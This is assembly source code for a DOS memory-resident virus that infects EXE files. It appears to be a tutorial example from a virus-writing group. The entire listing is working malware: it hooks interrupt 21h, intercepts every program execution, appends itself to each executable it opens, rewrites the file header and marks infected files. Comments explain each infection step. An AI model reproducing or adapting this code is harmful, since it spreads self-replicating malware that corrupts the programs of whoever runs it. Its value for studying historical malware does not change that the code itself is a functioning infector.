| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254 |
- .286
- virus segment
- assume cs:virus, ds:virus, es:virus
-
- jumps
- org 0CBh
-
- start:
-
- call delta ;Calculate delta offset
- delta:
- pop bp
- sub bp,offset delta
-
- push ds ;save PSP address
-
- push cs cs
- pop ds es
-
- mov ax,0CBCBh ;our "Codebreaker" residency check
- int 21h ;>what is CB?
- cmp bx,0C001h ;>C001!! :o)
- je restore ;its already resident
-
- pop ds
- push ds ;PSP address back into DS
- ;--------------------------------------------------
- mov ax,ds ;MCB residency
- dec ax ;For further clarification
- mov ds,ax ;read Codebreaker Tutorial 3
-
- sub word ptr ds:[3],40h
- sub word ptr ds:[12h],40h
-
- xor ax,ax
- mov ds,ax
-
- dec word ptr ds:[413h]
-
- mov ax,word ptr ds:[413h]
- shl ax,6
-
- mov es,ax
-
- push cs
- pop ds
-
- lea si,[bp+start]
- xor di,di
- mov cx,the_end - start
- rep movsb
- ;--------------------------------------------------
- xor ax,ax ;Setting of interrupts
- mov ds,ax ;For further clarification
- ;read Codebreaker Tutorial 3
- mov ax,es
- mov bx,new_int21h-start
- cli
- xchg bx,word ptr ds:[21h*4]
- xchg ax,word ptr ds:[21h*4+2]
- mov word ptr es:[old_int21h-start],bx
- mov word ptr es:[old_int21h+2-start],ax
- sti
- ;--------------------------------------------------
- push cs cs
- pop ds es
-
- mov ah,9 ;Warns the poor shmuck
- lea dx,[bp+message]
- int 21h
-
- restore: ;Control handed back
-
- lea si,[bp+old_ip] ;Restore orig IP
- lea di,[bp+original_ip]
- mov cx,4
- rep movsw
-
- ; Now for a clarification of the next four lines. At the beginning of
- ; the virus DS contains the address of the PSP. We now restore the
- ; address from the stack, place the address in ES. Then add 10h to
- ; skip over the PSP. Skip over the PSP(100h) with 10h? Sounds a little
- ; fishy, right? Well, remember that when you add 10h to AX, you are
- ; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP)
-
- pop ds
- mov ax,ds
- mov es,ax
- add ax,10h
-
- add word ptr cs:[bp+original_cs],ax ;Orig CS
- cli
- add ax,word ptr cs:[bp+original_ss] ;Orig SS
- mov ss,ax
- mov sp,word ptr cs:[bp+original_sp] ;Orig SP
- sti
-
- db 0eah ;jump to to it
- original_ip dw ? ;
- original_cs dw ?
- original_ss dw ?
- original_sp dw ?
-
-
- new_int21h: ;our int 21h handler
- pushf ;push the flags
- cmp ax,0CBCBh ;residency check
- jne no_install_check
- mov bx,0C001h ;already resident
- popf ;restore all flags
- iret ;return
- no_install_check:
- cmp ah,4bh ;check if execute
- je infect
- return:
- popf ;restore all flags
- db 0eah ;jmp to orig int 21h
- old_int21h dd ?
-
- infect:
- pusha ;only 286, saves all gen reg
- push ds
- push es
-
- call tsr_delta
- tsr_delta:
- pop bp ;a tsr delta offset %-)
- sub bp,offset tsr_delta
-
- mov ax,3d02h ;open file in DS:DX
- int 21h
- jc exit
-
- xchg ax,bx ;file handle to bx
-
- push cs cs
- pop ds es
-
- mov ah,3fh ;Read the target header
- lea dx,[bp+header] ;into our buffer
-
- mov cx,1ch
- int 21h
-
- cmp word ptr cs:[bp+header],'ZM' ;check if its an EXE
- je ok
- cmp word ptr cs:[bp+header],'MZ'
- je ok
- jmp close
-
- ok:
- cmp word ptr cs:[bp+header+12h],'BC' ;Checksum value checked for
- je close ;previous infection
-
- mov word ptr cs:[bp+header+12h],'BC' ;Mark it as infected
-
- mov ax,word ptr cs:[bp+header+14h] ;Save orig ExeIP
- mov word ptr cs:[bp+old_ip],ax ;Store in our buffer
- mov ax,word ptr cs:[bp+header+16h] ;Save orig ReloCS
- mov word ptr cs:[bp+old_cs],ax
- mov ax,word ptr cs:[bp+header+0eh] ;Save orig ReloSS
- mov word ptr cs:[bp+old_ss],ax
- mov ax,word ptr cs:[bp+header+10h] ;Save orig ExeSP
- mov word ptr cs:[bp+old_sp],ax
-
- mov ax,4202h ;Set pointer to end of file
- xor cx,cx
- xor dx,dx
- int 21h
-
- push ax dx ;Save EOF results
-
- ;Calculate new CS:IP, we set
- ;it to the EOF (this is where
- ;we will attach our virus)
-
- mov cx,16 ;Convert filesize into 16 byte
- div cx ;paragraphs
-
- sub ax,word ptr cs:[bp+header+8] ;Substract Header size from
- ;filesize to get the image
- ;(code/data) size.
-
- ;save:
- mov word ptr cs:[bp+header+14h],dx ;New ExeIP
- mov word ptr cs:[bp+header+16h],ax ;New ReloCS
-
- pop dx ax ;restore saved filesize
-
- add ax,the_end - start ;Add virus size to file size
- adc dx,0 ;Adds carry to DX
-
- mov cx,512 ;Calculate amount of pages
- div cx
-
- cmp dx,0
- je no_remainder
- inc ax ;if remainder, add 1
- no_remainder:
-
- mov word ptr cs:[bp+header+4],ax ;New PageCnt
- mov word ptr cs:[bp+header+2],dx ;New PartPag
-
- mov ah,40h ;write the virus to the EOF
- lea dx,[bp+start]
- mov cx,the_end - start
- int 21h
-
- mov ax,4200h ;Send pointer to beginning
- xor cx,cx
- xor dx,dx
- int 21h
-
- mov ah,40h ;Write the new header
- lea dx,[bp+header]
- mov cx,1ch
- int 21h
-
- mov al,7
- int 29h ; just a BEEEEEPPP
-
- close:
- mov ah,3eh ;close file
- int 21h
-
- exit:
- pop es
- pop ds
- popa
- jmp return
-
-
- old_ip dw offset exit_prog
- old_cs dw 0
- old_ss dw 0
- old_sp dw 0fffeh
-
- header db 1ch dup(?) ;Buffer for header
-
- message db 10,13,10,13
- db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
- db '- has been installed in your computers memory and will from now on infect any -',10,13
- db '- EXE file that you execute. -',10,13
- db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus. -',10,13,10,13
- db ' - www.codebreakers.org -',10,13,'$'
-
- the_end:
-
- exit_prog:
- mov ax,4c00h ;Request terminate program
- int 21h
-
- virus ends
- end start
|
